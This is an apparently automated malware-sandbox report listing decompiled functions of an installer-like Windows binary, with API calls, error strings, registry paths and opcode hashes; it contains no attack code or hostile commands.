                                                                                                                                                              • Opcode ID: 6acd77514f6430682e12380cb6c4e5b2bb8dd1adaa3dbccc6920f676641fef5f
                                                                                                                                                              • Instruction ID: cddfeeadd73c923b4679dd5f73e9393be0e7d5ef3ab8b0eeff76aebfc54decff
                                                                                                                                                              • Opcode Fuzzy Hash: 6acd77514f6430682e12380cb6c4e5b2bb8dd1adaa3dbccc6920f676641fef5f
                                                                                                                                                              • Instruction Fuzzy Hash: 7431E33020065AEFE7149E699CC4F67339DBB44364B20826DFE119B2A2E779CD1297A0
                                                                                                                                                              Function 007EAD44 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 007EADB3
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to extract all payloads from container: %ls, xrefs: 007EADF7
                                                                                                                                                              • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 007EAE4A
                                                                                                                                                              • Failed to open container: %ls., xrefs: 007EAD85
                                                                                                                                                              • Failed to extract payload: %ls from container: %ls, xrefs: 007EAE3E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString
                                                                                                                                                              • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                                                                                                                              • API String ID: 1825529933-3891707333
                                                                                                                                                              • Opcode ID: 514c0e70f63c7e06b0d4180f20c7defada5ba1b456734968d6f0236a96eed12f
                                                                                                                                                              • Instruction ID: 83664ecee0bf6caaff5fd324521c07ff03ecfe8fbd00d3cda2ac2cf9c0488585
                                                                                                                                                              • Opcode Fuzzy Hash: 514c0e70f63c7e06b0d4180f20c7defada5ba1b456734968d6f0236a96eed12f
                                                                                                                                                              • Instruction Fuzzy Hash: 27310232D01159FBCF22EAE5CC46E8E7768EF08720F104215FD20A6191E739AA50DBA2
                                                                                                                                                              Function 00807A10 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807AF4
                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00807AFF
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00807B0A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                              • String ID: `<u$atomutil.cpp
                                                                                                                                                              • API String ID: 2724874077-4051019476
                                                                                                                                                              • Opcode ID: a7bff558b2276771b139f360df18e431ecd7132e285f5f83c47b3c204e007a8a
                                                                                                                                                              • Instruction ID: 41ff3eb0c88586118d10c60b9007ec0754d2c91dc4fba928e2ef517e6e285ffd
                                                                                                                                                              • Opcode Fuzzy Hash: a7bff558b2276771b139f360df18e431ecd7132e285f5f83c47b3c204e007a8a
                                                                                                                                                              • Instruction Fuzzy Hash: 67318432E05539BBCB22AB94CC45F9EBBA9FF00760F154165E901FB191D770AE009BE0
                                                                                                                                                              Function 007CF005 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,007D0654,00000001,00000001,00000001,007D0654,00000000), ref: 007CF07D
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,007D0654,00000001,00000001,00000001,007D0654,00000000,00000001,00000000,?,007D0654,00000001), ref: 007CF09A
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to remove update registration key: %ls, xrefs: 007CF0C7
                                                                                                                                                              • PackageVersion, xrefs: 007CF05E
                                                                                                                                                              • Failed to format key for update registration., xrefs: 007CF033
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCompareString
                                                                                                                                                              • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                                                                                                                              • API String ID: 446873843-3222553582
                                                                                                                                                              • Opcode ID: c30e9404b5b065ae1b1d6842de2a419aaf9e83d5dbbd8df22a1a1a9a74ee1569
                                                                                                                                                              • Instruction ID: 0facffffe753f6f91dba018967305ad0cd55d11c6ed5a619cd6cbe28b3940b76
                                                                                                                                                              • Opcode Fuzzy Hash: c30e9404b5b065ae1b1d6842de2a419aaf9e83d5dbbd8df22a1a1a9a74ee1569
                                                                                                                                                              • Instruction Fuzzy Hash: 9A217A31D01129BADB219B69CC49FAFBFB9EF05720F100179FD14E2191D7359A40DA91
                                                                                                                                                              Function 0080433D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00804440: FindFirstFileW.KERNEL32(007E923A,?,00000100,00000000,00000000), ref: 0080447B
                                                                                                                                                                • Part of subcall function 00804440: FindClose.KERNEL32(00000000), ref: 00804487
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00804430
                                                                                                                                                                • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
                                                                                                                                                                • Part of subcall function 00801217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 0080123F
                                                                                                                                                                • Part of subcall function 00801217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,007D70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 00801276
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseFindQueryValue$FileFirstOpen
                                                                                                                                                              • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                                                                                                                              • API String ID: 3397690329-3978359083
                                                                                                                                                              • Opcode ID: 9aee79378a6ced7ff606d00447e4b51908bea50c6a78ea9d2eb5cf37a8f77200
                                                                                                                                                              • Instruction ID: 132201597ac6e24fb3fc30377545df6a785700c7e46540f0aaddfd052f4ffd50
                                                                                                                                                              • Opcode Fuzzy Hash: 9aee79378a6ced7ff606d00447e4b51908bea50c6a78ea9d2eb5cf37a8f77200
                                                                                                                                                              • Instruction Fuzzy Hash: A631BFB1981619FFDF60AF85CC41AAEB774FF00750F55907AEA05E61A1E3319E80CB64
                                                                                                                                                              Function 00804019 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CopyFileW.KERNEL32(00000000,007C4DBC,00000000,?,?,00000000,?,0080412D,00000000,007C4DBC,00000000,00000000,?,007D85EE,?,?), ref: 00804033
                                                                                                                                                              • GetLastError.KERNEL32(?,0080412D,00000000,007C4DBC,00000000,00000000,?,007D85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 00804041
                                                                                                                                                              • CopyFileW.KERNEL32(00000000,007C4DBC,00000000,007C4DBC,00000000,?,0080412D,00000000,007C4DBC,00000000,00000000,?,007D85EE,?,?,00000001), ref: 008040AC
                                                                                                                                                              • GetLastError.KERNEL32(?,0080412D,00000000,007C4DBC,00000000,00000000,?,007D85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 008040B6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CopyErrorFileLast
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 374144340-2967768451
                                                                                                                                                              • Opcode ID: 02f1821c17ed4ff0167f91dfa0cc083ce840bda615caa7876435efa21c6b5048
                                                                                                                                                              • Instruction ID: 8b91c6e871277c0d3d38a94ec3670a9301b65a082205a51e8cc350d3eb8e2395
                                                                                                                                                              • Opcode Fuzzy Hash: 02f1821c17ed4ff0167f91dfa0cc083ce840bda615caa7876435efa21c6b5048
                                                                                                                                                              • Instruction Fuzzy Hash: 652126F6680B3697EBF00AA64C40B3B6698FF11BA0B14113AFF04FB5D1E7618C4082E0
                                                                                                                                                              Function 007CEF1B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007CEF56
                                                                                                                                                                • Part of subcall function 00804153: SetFileAttributesW.KERNEL32(007E923A,00000080,00000000,007E923A,000000FF,00000000,?,?,007E923A), ref: 00804182
                                                                                                                                                                • Part of subcall function 00804153: GetLastError.KERNEL32(?,?,007E923A), ref: 0080418C
                                                                                                                                                                • Part of subcall function 007C3C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,007CEFA1,00000001,00000000,00000095,00000001,007D0663,00000095,00000000,swidtag,00000001), ref: 007C3C88
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate regid file path., xrefs: 007CEFB5
                                                                                                                                                              • Failed to format tag folder path., xrefs: 007CEFC3
                                                                                                                                                              • Failed to allocate regid folder path., xrefs: 007CEFBC
                                                                                                                                                              • swidtag, xrefs: 007CEF65
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesDirectoryErrorFileLastOpen@16Remove
                                                                                                                                                              • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
                                                                                                                                                              • API String ID: 1428973842-4170906717
                                                                                                                                                              • Opcode ID: a8c52198b595c83efa174cb8da7f26f811d19c9e07e3fcadc63562914309e1fe
                                                                                                                                                              • Instruction ID: 805b3c950c1016b9a323bef94182a095ec92a8c568cf1ee142c039cff6ca3dd9
                                                                                                                                                              • Opcode Fuzzy Hash: a8c52198b595c83efa174cb8da7f26f811d19c9e07e3fcadc63562914309e1fe
                                                                                                                                                              • Instruction Fuzzy Hash: F0217A31D00518FBCB65EB99CC46F9DFBB5FF44310F1080ADF524A62A1D7799A81AB90
                                                                                                                                                              Function 007E8DB6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
                                                                                                                                                              • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 007E8E3A
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,007CF7E0,00000001,00000100,000001B4,00000000), ref: 007E8E88
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to enumerate uninstall key for related bundles., xrefs: 007E8E99
                                                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 007E8DD7
                                                                                                                                                              • Failed to open uninstall registry key., xrefs: 007E8DFD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCompareOpenString
                                                                                                                                                              • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                              • API String ID: 2817536665-2531018330
                                                                                                                                                              • Opcode ID: 4a7b9e6774b8fc81a62b570dedc25489851215607415e9720240055c11068149
                                                                                                                                                              • Instruction ID: a7b7a7857562bd28f295de0883d8dc4e304551196313fafd4cedbc5f211e6a62
                                                                                                                                                              • Opcode Fuzzy Hash: 4a7b9e6774b8fc81a62b570dedc25489851215607415e9720240055c11068149
                                                                                                                                                              • Instruction Fuzzy Hash: 8921C932901268FFDB51AA95CC46FEEBA79FF08720F144264F814B6190DB794E90E691
                                                                                                                                                              Function 007ED259 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007ED2EE
                                                                                                                                                              • ReleaseMutex.KERNEL32(?), ref: 007ED31C
                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 007ED325
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                              • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                                                                                                                              • API String ID: 944053411-3611226795
                                                                                                                                                              • Opcode ID: 1907f51cb9ea77511aa511b422520ee4f488c9792497ddaa216d711c5f97610c
                                                                                                                                                              • Instruction ID: 8df50ba8611f813bc498b2e35ed0170fcedbe49a93cdd7a57de4a975567eb980
                                                                                                                                                              • Opcode Fuzzy Hash: 1907f51cb9ea77511aa511b422520ee4f488c9792497ddaa216d711c5f97610c
                                                                                                                                                              • Instruction Fuzzy Hash: 4F21A1B4600346FFDB10AF68D845A99BBF5FF48324F108629F964E7352C775AD508B90
                                                                                                                                                              Function 00805907 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,007E6B11,00000000,?), ref: 0080591D
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007E6B11,00000000,?,?,?,?,?,?,?,?,?,007E6F28,?,?), ref: 0080592B
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,007E6B11,00000000,?), ref: 00805965
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007E6B11,00000000,?,?,?,?,?,?,?,?,?,007E6F28,?,?), ref: 0080596F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                                                                                                                              • String ID: svcutil.cpp
                                                                                                                                                              • API String ID: 355237494-1746323212
                                                                                                                                                              • Opcode ID: ffd5933b2999735809d8cd7c0be99f6a0d526331edb19ae29e47e87fc68809af
                                                                                                                                                              • Instruction ID: 66bc2b111d00ec72e9bbaebcaf2a7fcc2d1d8a1282c6328ccaaf85ed75e1ab74
                                                                                                                                                              • Opcode Fuzzy Hash: ffd5933b2999735809d8cd7c0be99f6a0d526331edb19ae29e47e87fc68809af
                                                                                                                                                              • Instruction Fuzzy Hash: AD21F336941A39F7E7715A95AD08FAFBE6DFF40B70F114015BD05EB280E6258D009AF0
                                                                                                                                                              Function 00803245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00803258
                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00803264
                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 008032D8
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 008032E3
                                                                                                                                                                • Part of subcall function 00803498: SysAllocString.OLEAUT32(?), ref: 008034AD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$AllocVariant$ClearFreeInit
                                                                                                                                                              • String ID: `<u
                                                                                                                                                              • API String ID: 347726874-3367579956
                                                                                                                                                              • Opcode ID: 75edba7e0d9d637b19ca64f27aefbe1f934a7780599efd24fcb3ac2852a6f147
                                                                                                                                                              • Instruction ID: b0342afee4b0e0d90dbec2c964ed9e2dee60e3df58b89eac1b202b0a767fe8e4
                                                                                                                                                              • Opcode Fuzzy Hash: 75edba7e0d9d637b19ca64f27aefbe1f934a7780599efd24fcb3ac2852a6f147
                                                                                                                                                              • Instruction Fuzzy Hash: 5A214C31A01219AFCB54DFA4CC58EAEBBBDFF48716F114158E801EB260D7319E05CB90
                                                                                                                                                              Function 007C9839 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memcpy_s
                                                                                                                                                              • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
                                                                                                                                                              • API String ID: 2001391462-1605196437
                                                                                                                                                              • Opcode ID: 18eae3b9579885f330fcdda4a073f0533acbe1a2027c16fa15816a0ac6961d8e
                                                                                                                                                              • Instruction ID: 2de9b11747fb9e96ccc76bc774d3c7d244ae98df50fbe9942e2e1af5ee7835b1
                                                                                                                                                              • Opcode Fuzzy Hash: 18eae3b9579885f330fcdda4a073f0533acbe1a2027c16fa15816a0ac6961d8e
                                                                                                                                                              • Instruction Fuzzy Hash: 3211C833280210B7EB952DAC9C8EF963B94FF16720F04415DFE10AB2D2DA6AC91097E1
                                                                                                                                                              Function 007C9E16 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9E38
                                                                                                                                                              Strings
                                                                                                                                                              • File search: %ls, did not find path: %ls, xrefs: 007C9EA3
                                                                                                                                                              • Failed get file version., xrefs: 007C9E78
                                                                                                                                                              • Failed to format path string., xrefs: 007C9E43
                                                                                                                                                              • Failed to set variable., xrefs: 007C9E97
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open@16
                                                                                                                                                              • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                                                                                                                              • API String ID: 3613110473-2458530209
                                                                                                                                                              • Opcode ID: 6ee5076002bd6e4aa092d8d29f392d8822118cfe1715d5237f9a4e839f35797b
                                                                                                                                                              • Instruction ID: b5e7c4ae6e8531dd61d8d2ae55333cc19debe2249be2cc7405216b9915254750
                                                                                                                                                              • Opcode Fuzzy Hash: 6ee5076002bd6e4aa092d8d29f392d8822118cfe1715d5237f9a4e839f35797b
